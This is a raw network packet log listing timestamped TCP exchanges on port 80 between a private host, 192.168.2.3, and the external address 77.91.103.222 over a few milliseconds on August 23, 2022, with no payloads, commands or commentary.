Aug 23, 2022 18:24:03.727170944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727205992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727230072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727252960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727266073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727292061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727315903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727320910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727344036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727385044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727408886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727459908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727498055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727509975 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727514029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727550030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727562904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727647066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727710009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727736950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727806091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727844000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727852106 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727855921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727859020 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727881908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727905989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727921963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.727941036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727967024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.727989912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728013992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728029966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728034019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728038073 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728040934 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728076935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728112936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728127003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728163958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728257895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728281021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728310108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728317976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728322029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728326082 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728360891 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728411913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728466988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728481054 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728558064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728565931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728650093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728697062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728722095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728770971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728776932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728780985 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.728825092 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728863955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.728902102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729022980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729054928 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729079008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729106903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729130983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729142904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729204893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729259014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729275942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729441881 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729469061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729492903 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729598045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729604959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729631901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729676008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729701042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729726076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729778051 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729785919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729789972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729816914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729872942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.729897022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.729993105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730035067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730058908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730084896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730124950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730129957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730150938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730191946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730200052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730249882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730310917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730333090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730355978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730452061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730475903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730537891 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730576992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730652094 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730685949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730911970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.730959892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.730998039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731034994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731106997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731136084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.731149912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.731236935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731278896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.731424093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731528997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731563091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731648922 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731784105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.731795073 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.731827974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.731971979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732004881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.732248068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732357025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.732441902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732489109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732626915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.732676029 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732706070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732758045 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.732815027 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.732824087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.732887983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733043909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733141899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733419895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733484983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733546972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733597994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733639002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733665943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733671904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733701944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733763933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733793020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733804941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733831882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733860970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733866930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733892918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733922958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.733933926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733941078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.733969927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.734067917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.734138966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.734209061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.734236956 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.734249115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.734479904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.734504938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.734976053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.735025883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.735090971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.735332012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.735898972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736115932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736130953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736156940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736181021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736206055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736232042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736246109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736252069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736274958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736299038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736310005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736315012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736320019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736342907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736371040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736397028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736419916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736443996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736458063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736463070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736465931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736469984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736494064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736521006 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736538887 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736543894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736562014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736588001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736613989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736639023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736661911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736666918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736670971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736682892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736706972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736731052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736747980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736752987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736772060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736797094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736823082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736849070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736869097 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736875057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736879110 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736888885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736913919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736927032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736932039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.736953974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736979008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.736994028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737015009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737036943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737060070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737071037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737097025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737157106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737181902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737191916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737219095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737229109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737252951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737258911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737272978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737297058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737323046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737343073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737370968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737380028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737418890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737430096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737454891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737479925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737505913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737518072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737523079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737545967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737567902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737590075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737595081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737606049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737633944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737660885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737670898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737675905 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737699986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737730980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737740040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737745047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737771988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737780094 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737803936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737831116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737855911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737880945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737893105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737900972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737931013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737938881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737943888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.737967968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.737982988 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738007069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738033056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738054037 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738073111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738099098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738110065 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738122940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738147020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738172054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738188982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738193989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738214970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738231897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738254070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738270044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738310099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738336086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738363028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738390923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738403082 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738408089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738432884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738471031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738476992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738509893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738534927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738594055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738610029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738631964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.738642931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738742113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.738981962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739011049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739034891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739059925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739082098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739089012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739093065 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739095926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739109039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739135027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739159107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739204884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739212036 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739326000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739371061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739398003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739432096 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739481926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739547968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739624977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739680052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739727974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739753962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739779949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739828110 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739833117 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.739883900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739909887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739933968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739959955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739984989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.739998102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.740004063 CEST	49844	80	192.168.2.3	77.91.103.222
